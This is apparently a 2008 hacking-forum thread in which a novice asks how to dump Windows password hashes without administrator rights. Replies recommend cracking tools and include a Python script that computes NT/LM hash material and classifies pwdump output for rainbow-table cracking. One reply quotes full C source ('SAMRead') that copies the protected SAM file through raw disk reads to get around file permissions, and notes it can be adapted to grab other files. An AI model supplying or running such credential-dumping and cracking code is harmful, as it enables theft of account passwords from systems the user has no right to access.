tempnode, posted September 8, 2008:

Is there any form of PWDump that does NOT require admin access to successfully run? I'm not very familiar with the hacking tools... but I'm trying to learn. Thanks!
mubix, posted September 8, 2008:

> Is there any form of PWDump that does NOT require admin access to successfully run? I'm not very familiar with the hacking tools... but I'm trying to learn. Thanks!

Not really. This is due to the file it accesses, the SAM file, which is guarded by permissions that only allow administrative access. I welcome you to try out a program called Cain & Abel and see what you can find.
Esqulax, posted September 8, 2008:

You can boot BackTrack and run a command to save the password hash.
digip, posted September 8, 2008:

Easiest tool for cracking them is http://ophcrack.sourceforge.net/ since it does it automatically on boot. You can also copy the hashes from the CLI to a USB key for cracking later against rainbow tables if the CD can't crack them for you, given stronger passwords (longer than 14 characters and NTLM-hashed). Plus it will now do Vista passwords as well.

Features:
» Runs on Windows, Linux/Unix, Mac OS X, ...
» Cracks LM and NTLM hashes.
» Free tables available for Windows XP and Vista.
» Brute-force module for simple passwords.
» LiveCD available to simplify the cracking.
» Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
» Free and open source software (GPL).
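The post above turns on the difference between LM and NTLM hashes and the 14-character line. The following is an added example, not code from the thread, from ophcrack or from pwdump: it computes the NT hash (MD4 over UTF-16LE, implemented inline because hashlib's md4 depends on OpenSSL's legacy provider), shows the LM preprocessing that makes LM crackable seven characters at a time, and classifies pwdump-format lines. The DES step of LM is deliberately left out, the latin-1 encoding stands in for the OEM code page LM really uses, and the sample pwdump lines are constructed here.

```python
"""NT and LM hash material as stored in the SAM, with a pwdump-line classifier.

Added example, not code from the thread or from ophcrack/pwdump. MD4 follows
RFC 1320. The LM DES step is intentionally left out: only the preprocessing
that makes LM crackable by halves is shown.
"""
import struct

_MASK = 0xFFFFFFFF
# LM hash of the empty string; pwdump prints it when no LM hash is stored
# (LM storage disabled, Vista's default, or password longer than 14 chars).
# Each 8-byte half is AAD3B435B51404EE, so that value in the second half
# alone means the password is 7 characters or fewer.
EMPTY_LM = 'AAD3B435B51404EEAAD3B435B51404EE'
EMPTY_NT = '31D6CFE0D16AE931B73C59D7E0C089C0'  # MD4 of the empty string


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & _MASK


def _md4_compress(state, block):
    """Three MD4 rounds over one 64-byte block (RFC 1320 section 3.4)."""
    X = struct.unpack('<16I', block)
    a, b, c, d = state
    for i in range(16):                                  # round 1: F = (x & y) | (~x & z)
        a = _rotl((a + ((b & c) | (~b & d)) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                  # round 2: G = majority
        k = (i % 4) * 4 + i // 4
        a = _rotl((a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999) & _MASK,
                  (3, 5, 9, 13)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                  # round 3: H = xor
        k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
        a = _rotl((a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
        a, b, c, d = d, a, b, c
    return tuple((s + v) & _MASK for s, v in zip(state, (a, b, c, d)))


def md4(data):
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    padded = data + b'\x80' + b'\x00' * ((55 - len(data)) % 64) + struct.pack('<Q', len(data) * 8)
    for off in range(0, len(padded), 64):
        state = _md4_compress(state, padded[off:off + 64])
    return struct.pack('<4I', *state)


def nt_hash(password):
    """NT hash: MD4 over the UTF-16LE password. Unsalted, so equal passwords collide."""
    return md4(password.encode('utf-16-le')).hex().upper()


def lm_halves(password):
    """The two 7-byte DES keys LM derives, or None when no LM hash is stored.

    LM uppercases, keeps at most 14 bytes, zero-pads and splits in two; each
    half is then DES-encrypted on its own with the constant "KGS!@#$%" (that
    step is not implemented here). Assumption: latin-1 stands in for the OEM
    code page LM actually uses.
    """
    if len(password) > 14:
        return None
    raw = password.upper().encode('latin-1', 'replace')[:14].ljust(14, b'\x00')
    return raw[:7], raw[7:]


def classify_pwdump_line(line):
    """Parse a pwdump-format line 'user:rid:lm:nt:::' and say what it reveals."""
    user, rid, lm, nt = line.strip().split(':')[:4]
    lm = lm.upper()
    return {
        'user': user,
        'rid': int(rid),
        'lm_stored': lm != EMPTY_LM,              # False: LM off or password > 14 chars
        'password_le_7': lm != EMPTY_LM and lm[16:] == EMPTY_LM[16:],
        'nt_empty': nt.upper() == EMPTY_NT,
    }


# Constructed sample lines. NT values are nt_hash('password') and nt_hash('');
# the LM value on the 'bob' line is the widely published LM hash of 'password'.
SAMPLE_PWDUMP = [
    'Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C:::',
    'Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::',
    'bob:1001:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:::',
]

if __name__ == '__main__':
    for sample in SAMPLE_PWDUMP:
        print(classify_pwdump_line(sample))
    print('NT("password") =', nt_hash('password'))
    print('LM halves("Passw0rd!") =', lm_halves('Passw0rd!'))
```

The classifier is what you look at before picking a table set: a line whose LM field is the empty constant has nothing for an LM rainbow table to hit, and a second half of AAD3B435B51404EE tells you the password fits in one 7-character DES half.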
Iain, posted September 8, 2008:

> Not really. This is due to the file it accesses, the SAM file, which is guarded by permissions that only allow administrative access. I welcome you to try out a program called Cain & Abel and see what you can find.

I'm fairly sure that the SAM file can be obtained without admin access. I'm not entirely familiar with the programming, but the file is obtained by accessing the drive directly rather than via the File Table. The location of the file is obtained and the drive accessed directly. I'll see if I can find the details if anyone's interested.
VaKo, posted September 9, 2008:

That does sound fun actually, post some details.
Iain, posted September 9, 2008:

Here's the code:

/*
 SAMRead - by Napalm @ NetCore2K
 -------------------------------
 Please try and read and understand this source code. You will learn something.

 Sector  = 512 bytes of disk space.
 Cluster = A group of sectors. This is different depending on your file
           system, but normally it's 4 KB, so that's 8 sectors.
 VCN     = Virtual Cluster Number. Simply the index of the cluster within its context.
 LCN     = Logical Cluster Number. The physical cluster index on the containing media.
 Extent  = A run of contiguous clusters.

 The DirectCopy function invokes a device control code to get the cluster
 information about a file. We then loop through each resulting extent and copy
 each cluster to a new file.
*/
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <winioctl.h>

BOOL DirectCopy(LPSTR lpszSrc, LPSTR lpszDest)
{
    BOOL bResult = FALSE;
    /* Only FILE_READ_ATTRIBUTES is requested: the file's data is never read through this handle. */
    HANDLE hSrc = CreateFile(lpszSrc, FILE_READ_ATTRIBUTES,
                             FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                             NULL, OPEN_EXISTING, 0, 0);
    if(hSrc != INVALID_HANDLE_VALUE){
        CHAR szDrive[8];
        wsprintf(szDrive, "%c:\\", *lpszSrc);                 /* root path for GetDiskFreeSpace */
        DWORD dwSectorPerCluster = 0, dwBytesPerSector = 0;
        GetDiskFreeSpace(szDrive, &dwSectorPerCluster, &dwBytesPerSector, NULL, NULL);
        DWORD dwClusterSize = dwBytesPerSector * dwSectorPerCluster;
        LARGE_INTEGER liFileSize;
        liFileSize.LowPart = GetFileSize(hSrc, (LPDWORD)&liFileSize.HighPart);
        /* Round up: a file that is not a whole number of clusters still occupies its last cluster. */
        DWORD dwClusters = (DWORD)((liFileSize.QuadPart + dwClusterSize - 1) / dwClusterSize);
        DWORD dwRead, dwWritten;
        DWORD dwPointsSize = sizeof(RETRIEVAL_POINTERS_BUFFER) + dwClusters * (sizeof(LARGE_INTEGER) * 2);
        PRETRIEVAL_POINTERS_BUFFER pPoints = (PRETRIEVAL_POINTERS_BUFFER) new BYTE[dwPointsSize];
        STARTING_VCN_INPUT_BUFFER vcnStart = { 0 };
        /* Ask the file system for the file's VCN -> LCN map (its extents). */
        if(DeviceIoControl(hSrc, FSCTL_GET_RETRIEVAL_POINTERS, &vcnStart, sizeof(vcnStart),
                           pPoints, dwPointsSize, &dwWritten, NULL)){
            wsprintf(szDrive, "\\\\.\\%c:", *lpszSrc);        /* raw volume device, e.g. \\.\C: */
            HANDLE hDrive = CreateFile(szDrive, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                                       NULL, OPEN_EXISTING, 0, 0);
            if(hDrive != INVALID_HANDLE_VALUE){
                HANDLE hDest = CreateFile(lpszDest, GENERIC_WRITE, 0, NULL, CREATE_NEW, 0, 0);
                if(hDest != INVALID_HANDLE_VALUE){
                    /* Pre-size the destination so each extent can be written at its VCN offset. */
                    SetFilePointer(hDest, liFileSize.LowPart, &liFileSize.HighPart, FILE_BEGIN);
                    SetEndOfFile(hDest);
                    LPBYTE lpCluster = new BYTE[dwClusterSize];
                    LARGE_INTEGER vcnPrev = pPoints->StartingVcn;
                    for(DWORD dwExtent = 0; dwExtent < pPoints->ExtentCount; dwExtent++){
                        DWORD dwLength = (DWORD)(pPoints->Extents[dwExtent].NextVcn.QuadPart - vcnPrev.QuadPart);
                        /* Assign QuadPart explicitly: brace-initialising a LARGE_INTEGER only sets
                           LowPart and would truncate any offset beyond 4 GB on the volume. */
                        LARGE_INTEGER liSrcPos, liDstPos;
                        liSrcPos.QuadPart = pPoints->Extents[dwExtent].Lcn.QuadPart * dwClusterSize;
                        liDstPos.QuadPart = vcnPrev.QuadPart * dwClusterSize;
                        for(DWORD dwCluster = 0; dwCluster < dwLength; dwCluster++){
                            /* Raw volume reads must be sector aligned; cluster offsets always are. */
                            SetFilePointer(hDrive, liSrcPos.LowPart, &liSrcPos.HighPart, FILE_BEGIN);
                            ReadFile(hDrive, lpCluster, dwClusterSize, &dwRead, NULL);
                            SetFilePointer(hDest, liDstPos.LowPart, &liDstPos.HighPart, FILE_BEGIN);
                            WriteFile(hDest, lpCluster, dwRead, &dwWritten, NULL);
                            liSrcPos.QuadPart += dwClusterSize;
                            liDstPos.QuadPart += dwClusterSize;
                        }
                        vcnPrev = pPoints->Extents[dwExtent].NextVcn;
                    }
                    delete[] lpCluster;
                    CloseHandle(hDest);
                    bResult = TRUE;
                }
                CloseHandle(hDrive);
            }
        }
        delete[] (LPBYTE)pPoints;
        CloseHandle(hSrc);
    }
    return bResult;
}

int main(int argc, char *argv[])
{
    CHAR szSAMFile[MAX_PATH + 12];
    GetSystemDirectory(szSAMFile, MAX_PATH);
    lstrcat(szSAMFile, "\\config\\SAM");
    /* Exit code 0 on success, 1 on failure. */
    return DirectCopy(szSAMFile, ".\\SAM.dat") ? 0 : 1;
}

from http://www.rohitab.com/discuss/index.php?s...&hl=samread

There's a compiled executable there too. The code can be changed to grab the system file too. I read a couple of comments on the same group that the SAM and system files can be retrieved whether logged in with admin rights or not. I've not tried it though.
digip, posted September 9, 2008:

Wow. If this works like you said, then any user can copy ANY file on disk from any other account. Have you tried it? Any proof it still works? The post is kinda old, and I imagine it could be patched against or monitored at the kernel level. Cain and pwdump will crash lsass and cause a system to reboot, so at some point Windows patched against them. I imagine they could be doing the same thing, but I don't know their process of reading the SAM file.
Iain, posted September 10, 2008:

I guess if someone has an XP SP3 fully patched PC, they could try it. The last time that I played around was well before SP3. Now, if it could be changed to WRITE directly to anywhere on the disc, that could be very dangerous ... (yes, I suppose that writing to the disc isn't all that hard, but what about the File Table entry and setting the file permissions etc.?).

Edit: as a matter of interest, I'm fairly sure that the same poster on Rohitab produced code to copy any file using the same technique. I recall that user interaction was as the executable was run, rather than having to modify the code then recompile it. That made it much more user friendly. I don't know if it's been tried on Vista.